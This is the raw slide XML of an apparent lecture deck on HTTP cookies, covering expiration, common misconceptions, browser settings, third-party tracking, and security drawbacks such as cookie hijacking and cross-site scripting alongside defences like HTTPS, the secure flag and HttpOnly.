                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, in contrast to what provided in the original specification of Netscape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DF06456-57DC-4CB8-B644-A7F768741A23}"/>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i="1" dirty="0" err="1"/>
              <a:t>Expiration</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA0E2DCA-C496-4D2A-8022-55E16877D59B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>Cookies are not sent to the server in the case:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>End user session (closing the browser) if the cookie is not persistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>Has been reached expiration date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>The expiration date has been reset (by the server or by a script) to an earlier date, already passed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>A server or a script explicitly decide to delete it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>The browser destroys the cookie in response to a user request</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CF51B20-A613-4A43-A602-CF1045D47894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>Misconceptions about Cookies..</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1C728F5-7942-48C2-9217-9A939ACDAEB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1566863"/>
            <a:ext cx="8686800" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are same as worms and viruses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> can generate pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>ups</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>They</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> for spamming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They can only be used for advertising</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They can erase data from the user's hard disks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They can read personal information stored on the user's computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controversial EU directive 2009/136/CE, IT Law 69-70/2012 seems to require that web sites MUST ask permission for storing cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"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C1610C3-2B09-4B99-BD2B-894B8696C394}"/>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Browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>settings</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56323" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9535FA9F-B663-4C60-839D-8B26451D824C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>Most browsers allow </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>to enable or disable cookies completely </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>to see the cookies currently stored in the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>to selectively delete the cookies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26D6B9-D556-48CC-9461-EDEABBB4C544}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Privacy and third-party cookies</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{251C81CD-F7B5-4B33-9E5F-EA91D6937EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="3600" i="1"/>
              <a:t>third-party cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="3600"/>
              <a:t>also include those from unwanted pop-up ads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="3600"/>
              <a:t>Used to track users across different sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="3200"/>
              <a:t>Building a user profile is potentially dangerous to your privacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="3600"/>
              <a:t>They can be disabled on most browsers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91713A0-CFF6-45A0-BCBE-2600A533DB1C}"/>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Drawbacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> (1)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9753BA87-6764-4F5D-BEFC-F19C2078694A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600201"/>
            <a:ext cx="8229600" cy="4329113"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Inaccurate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>identification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence cookies do not identify a person, but a combination of a user account, a computer, and a Web browser. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thus, anyone has multiple sets of cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Likewise, cookies do not differentiate between multiple users who share the same user account, computer, and browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"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FFB78D-CC6C-4B73-A18A-1CCD801FBC83}"/>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Drawbacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> (2)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C48F27B-4BA6-4BE2-B27E-B252685E18FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600201"/>
            <a:ext cx="8229600" cy="5114925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cookie hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A cookie can be caught from another computer that is able to read from the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cookie theft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the act of intercepting cookies by unauthorized parties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Packet sniffing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can contain cookies when the traffic traveling over unencrypted http sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be remedied by using Transport Layer Security (https) to encrypt the connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Several sites while using https encrypted communications for user authentication in the later stages, for performance reasons use unencrypted connections. Cookies can be intercepted and the attacker could impersonate a cookie in other sites (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>cookiemonster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>A server can set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0"/>
              <a:t>secure flag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>for a cookie. In this case, the browser will only send cookies over a secure channel, such as an SSL connection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"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177D44D-8F1D-4145-8650-4508C0B3E830}"/>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Drawbacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> (3)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2110D46-7F43-4515-9BDD-D854A70FB71C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600200"/>
            <a:ext cx="8229600" cy="5043488"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a cookie that should be only exchanged between a server and a client is sent elsewhere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure that both the browser to send cookies to malicious server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most browsers allow the execution of pieces of code on the client machine. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If cookies are accessible during execution, their values ​​could be communicated to the malicious server, which should not actually have access to them. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypting Cookies do not prevent this type of attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is a typical attack to sites that allow a user to publish content to html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incorporating the html code into post an attacker could get cookies from a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This attack can be prevented using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> flag, an option introduced by Microsoft in Internet Explorer 6, you need to make the cookie inaccessible to client-side script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34814C-1474-48C1-B746-B195A1A9A3CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:br>
              <a:rPr lang="it-IT" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>Draw0ììacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>(4)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
